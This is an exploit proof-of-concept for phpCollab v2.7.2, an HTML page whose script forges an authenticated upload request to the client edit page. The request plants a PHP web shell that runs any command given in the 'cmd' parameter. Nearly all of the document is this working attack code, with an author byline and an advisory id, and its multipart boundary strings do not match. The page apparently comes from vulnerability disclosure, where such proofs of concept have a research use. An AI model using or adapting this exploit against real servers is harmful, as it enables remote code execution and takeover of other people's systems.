#/ #* phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script #* Author : Trung Le #* Tutorial Video : https://youtu.be/BLFbUJ4n8hY #* Twitter : @lethanhtrungdbp #* Facebook : fb.com/c0nc4nh0 #/ <!DOCTYPE html> <html> <title>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</title> <body> <script type="text/javascript"> function upload(){ var xhr = new XMLHttpRequest(); xhr.open("POST", "/phpcol/clients/editclient.php?action=add&", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2273947705998934173936604226"); xhr.withCredentials = true; var body = "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n" + "\r\n" + "100000000\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="owner"\r\n" + "\r\n" + "1\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="name"\r\n" + "\r\n" + "100\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="address"\r\n" + "\r\n" + "\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="phone"\r\n" + "\r\n" + "\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="url"\r\n" + "\r\n" + "\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="email"\r\n" + "\r\n" + "\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="comments"\r\n" + "\r\n" + "\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="hourly_rate"\r\n" + "\r\n" + "0.00\r\n" + "-----------------------------11872893914229319724059542750\r\n" + "Content-Disposition: form-data; name="upload"; filename="info.php"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "<HTML><BODY>\r\n" + "<FORM METHOD="GET" NAME="myform" ACTION="">\r\n" + "<INPUT TYPE="text" NAME="cmd">\r\n" + "<INPUT TYPE="submit" VALUE="Send">\r\n" + "</FORM>\r\n" + "<pre>\r\n" + "<?\r\n" + "if($_GET['cmd']) {\r\n" + " system($_GET['cmd']);\r\n" + " }\r\n" + "?>\r\n" + "</pre>\r\n" + "</BODY></HTML>\r\n" + "\r\n" + "\r\n" + "\r\n" + "-----------------------------11872893914229319724059542750--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <h3>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</h3> <form action="#"> <button type="button" onclick=upload()>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</button> </form><br /> <iframe style="border:2px;border-style:dashed;color:#d3d3d3" srcdoc="command output frame" width="700" height="600" name="ZSL_iframe"> </iframe> <br /> <font size="2" color="#d3d3d3">ZSL-2016-5328</font> </body> </html>